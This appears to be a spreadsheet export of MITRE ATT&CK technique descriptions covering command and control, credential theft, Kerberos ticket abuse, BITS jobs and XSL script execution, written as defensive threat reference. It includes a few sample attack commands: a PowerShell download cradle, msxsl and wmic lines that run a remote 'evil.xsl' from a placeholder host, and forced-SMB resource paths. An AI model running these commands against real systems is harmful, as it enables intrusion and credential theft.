On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet.  Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.  Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks)  To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.
Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet)</t>
  </si>
  <si>
    <t>Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). 
On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as &lt;code&gt;IEX(New-Object Net.WebClient).downloadString()&lt;/code&gt; and &lt;code&gt;Invoke-WebRequest&lt;/code&gt;. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)
Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts.
Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)</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</si>
  <si>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Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.</t>
  </si>
  <si>
    <t>Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.</t>
  </si>
  <si>
    <t>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reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.</t>
  </si>
  <si>
    <t>Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Adversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.(Citation: change_rdp_port_conti)</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.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Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may obfuscate command and control traffic to make it more difficult to detect. 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or impersonating legitimate protocols. </t>
  </si>
  <si>
    <t>Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
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
The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.</t>
  </si>
  <si>
    <t>Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.</t>
  </si>
  <si>
    <t>Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).</t>
  </si>
  <si>
    <t>Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.</t>
  </si>
  <si>
    <t>Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. 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
Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.
In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)
On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.
Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.
In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)
Token theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. 
Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)
Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.  
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
</t>
  </si>
  <si>
    <t>Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.</t>
  </si>
  <si>
    <t>Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
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(Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.
Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)
Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)),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 (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)
There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:
* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to &lt;code&gt;file[:]//[remote address]/Normal.dotm&lt;/code&gt; to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as &lt;code&gt;\\[remote address]\pic.png&lt;/code&gt; that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.
Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Adversaries may also forge tokens by taking advantage of features such as the `AssumeRole` and `GetFederationToken` APIs in AWS, which allow users to request temporary security credentials (i.e., [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005)), or the `zmprov gdpak` command in Zimbra, which generates a pre-authentication key that can be used to generate tokens for any user in the domain.(Citation: AWS Temporary Security Credentials)(Citation: Zimbra Preauth)
Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)  </t>
  </si>
  <si>
    <t>Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
Adversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account.
In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)</t>
  </si>
  <si>
    <t>Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.
Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)</t>
  </si>
  <si>
    <t>Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. 
If a smart card is used for multi-factor authentication,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 (Citation: Mandiant M Trends 2011)
Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)
Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.(Citation: Okta Scatter Swine 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in &lt;code&gt;klist&lt;/code&gt; utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in &lt;code&gt;/var/lib/sss/secrets/secrets.ldb&lt;/code&gt; as well as the corresponding key located in &lt;code&gt;/var/lib/sss/secrets/.secrets.mkey&lt;/code&gt;. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the &lt;code&gt;/etc/krb5.conf&lt;/code&gt; configuration file and the &lt;code&gt;KRB5CCNAME&lt;/code&gt; environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using &lt;code&gt;kinit&lt;/code&gt;, &lt;code&gt;klist&lt;/code&gt;, &lt;code&gt;ktutil&lt;/code&gt;, and &lt;code&gt;kcc&lt;/code&gt; built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
</t>
  </si>
  <si>
    <t>An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)
There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)
After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in an attempt to collect credentials. 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authenticated access to systems. One example of this is `MS14-068`, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don't properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.(Citation: Bugcrowd Replay Attack)(Citation: Comparitech Replay Attack)(Citation: Microsoft Midnight Blizzard Replay Attack)
Such exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.(Citation: Storm-0558 techniques for unauthorized email access)
Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW)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In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)
The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. 
Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)
Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.
</t>
  </si>
  <si>
    <t>Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)
Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.</t>
  </si>
  <si>
    <t>Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS)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
The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)
Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)
BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.
There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.</t>
  </si>
  <si>
    <t>Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)
* &lt;code&gt;msxsl.exe customers[.]xml script[.]xsl&lt;/code&gt;
* &lt;code&gt;msxsl.exe script[.]xsl script[.]xsl&lt;/code&gt;
* &lt;code&gt;msxsl.exe script[.]jpeg script[.]jpeg&lt;/code&gt;
Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
* Local File: &lt;code&gt;wmic process list /FORMAT:evil[.]xsl&lt;/code&gt;
* Remote File: &lt;code&gt;wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”&lt;/code&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.
Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) </t>
  </si>
  <si>
    <t>Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.
Similarly, on Linux systems adversaries may abuse trusted binaries such as &lt;code&gt;split&lt;/code&gt; to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)</t>
  </si>
  <si>
    <t>Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.</t>
  </si>
  <si>
    <t>Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails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guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.</t>
  </si>
  <si>
    <t>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or by using utilities present on the system.
